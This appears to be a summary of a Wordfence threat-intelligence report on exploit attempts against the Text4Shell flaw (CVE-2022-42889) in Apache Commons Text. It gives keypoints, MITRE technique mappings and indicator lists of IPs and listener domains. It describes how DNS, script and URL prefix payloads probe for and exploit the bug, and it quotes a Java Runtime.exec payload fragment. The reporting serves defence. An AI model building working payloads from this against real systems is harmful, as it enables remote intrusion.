Wordfence Threat Intelligence monitored exploit attempts targeting CVE-2022-42889, aka Text4Shell, across millions of sites and observed payloads in DNS, script, and URL prefixes aimed at remote code execution. Most activity leverages DNS prefix probes to contact attacker-controlled listener domains, with some payloads designed to trigger actual code execution via script payloads and listener callbacks.
#Text4Shell #CVE-2022-42889 #ApacheCommonsText #Interactsh #Canarytokens #Wordfence
#Text4Shell #CVE-2022-42889 #ApacheCommonsText #Interactsh #Canarytokens #Wordfence
Keypoints
- Text4Shell is a remote code execution vulnerability in Apache Commons Text versions 1.5β1.9; it was patched in 1.10.0.
- Wordfence began monitoring for CVE-2022-42889 activity on Oct 18, 2022 across a network of about 4 million websites.
- The majority of observed payloads appear in DNS prefix form and are used to scan for vulnerable installations; a successful attempt would cause the victim site to query attacker-controlled domains.
- Script prefix payloads can execute code (e.g., using Java code) to perform actions like contacting a listener or running commands.
- DNS, script, and URL prefixes each have different roles, with DNS being the most common probe method and URL prefix being the least common.
- Tracked indicators include a long list of IPs and numerous listener domains (e.g., tress.cf, oast.online, canarytokens.com), indicating broad scanning and potential C2 callbacks.
- Wordfence Intelligence IP Threat Feed updates hourly with new observed RCE activity related to this CVE; Ramuel Gall authored the article.
MITRE Techniques
- [T1203] Exploitation for Client Execution β Remote code execution enabled by Text4Shell; βText4Shell is a vulnerability in the Apache Commons Text library versions 1.5 through 1.9 that can be used to achieve remote code execution.β
- [T1071.004] Application Layer Protocol: DNS β DNS prefix payloads cause the victim to contact attacker-controlled listener domains; βThe vast majority of requests we are seeing are using the DNS prefix β¦ a successful attempt would result in the victim site making a DNS query to the attacker-controlled listener domain.β
- [T1059.007] Java β Script payloads invoke Java code to run commands; ββ¦java.lang.Runtime.getRuntime().exec(β¦)β (as shown in the payload example)
Indicators of Compromise
- [IP Address] IP addresses observed sending requests targeting the vulnerability β 103.127.158.166*, 13.53.121.211*, and many more (see full list in article).
- [Domain] Attacker-controlled listener and related domains β tress.cf, oast.online, oast.site, canarytokens.com, and other listed listeners (e.g., oast.live, oast.me).